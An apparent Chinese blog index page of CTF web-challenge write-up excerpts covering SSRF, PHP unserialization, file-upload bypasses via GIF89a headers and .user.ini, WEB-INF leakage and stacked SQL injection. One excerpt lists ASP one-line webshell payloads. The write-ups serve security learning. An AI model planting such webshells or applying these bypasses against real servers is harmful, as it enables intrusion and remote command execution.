随笔分类 - CTF
刷题小记
摘要:进入页面 贴出源码 1 <?php 2 3 if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { 4 $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; 5 } 6 7 if(!isset($
阅读全文
摘要:贴出源码 1 @app.route('/getUrl', methods=['GET', 'POST']) 2 def getUrl(): 3 url = request.args.get("url") 4 host = parse.urlparse(url).hostname 5 #解析url,赋
阅读全文
摘要:0x01 前言 通常我们在利用反序列化漏洞的时候,只能将序列化后的字符串传入unserialize(),随着代码安全性越来越高,利用难度也越来越大。但在不久前的Black Hat上,安全研究员Sam Thomas分享了议题It’s a PHP unserialization vulnerabilit
阅读全文
摘要:一道非常有意思的反序列化漏洞的题目 花费了我不少时间理解和记忆 这里简单记录其中精髓 首先打开是一个登陆页面 dirsearch扫描到了www.zip源码备份 update.php 1 <?php 2 require_once('class.php'); 3 if($_SESSION['userna
阅读全文
摘要:虽然学过Javaweb的开发,但没好好学,所以对Javaweb了解不深 菜的真实 WEB-INF/web.xml泄露 贴一个别人的源码泄露总结ctf/web源码泄露及利用办法【总结中】 WEB-INF主要包含一下文件或目录: /WEB-INF/web.xml:Web应用程序配置文件,描述了 serv
阅读全文
摘要:分为注册和登陆两个页面 据大佬wp登陆页面又盲注,但我没测试 直接注册后登陆 注册后发现,会显示输入的url 根据目录扫描,发现robots.txt和flag.php robots.txt有源码备份 审计发现应该是ssrf,初想通过注册时直接通过file协议请求到flag.php 但注册限制必须是h
阅读全文
摘要:文件上传 黑名单过滤 调用了php的exif_imagetype()函数 利用文件头GIF89a绕过即可 过滤了文本内容<? <script language='php'><script>绕过即可 修改MIME和利用特殊扩展名均失败 正确姿势: 利用 .user.ini .user.ini 我们先在
阅读全文
摘要:ASP<%eval request("sb")%> <%execute request("sb")%> <%execute(request("sb"))%> <%execute request("sb")%><%'<% loop <%:%> <%'<% loop <%:%><%execute req
阅读全文
摘要:堆叠注入 利用原理: 补充系统变量@@sql_modesql_mode:是一组mysql支持的基本语法及校验规则PIPES_AS_CONCAT:将“||”视为字符串的连接操作符而非或运算符,这和Oracle数据库是一样的,也和字符串的拼接函数Concat相类似 猜测后台sql语句为: select
阅读全文

浙公网安备 33010602011771号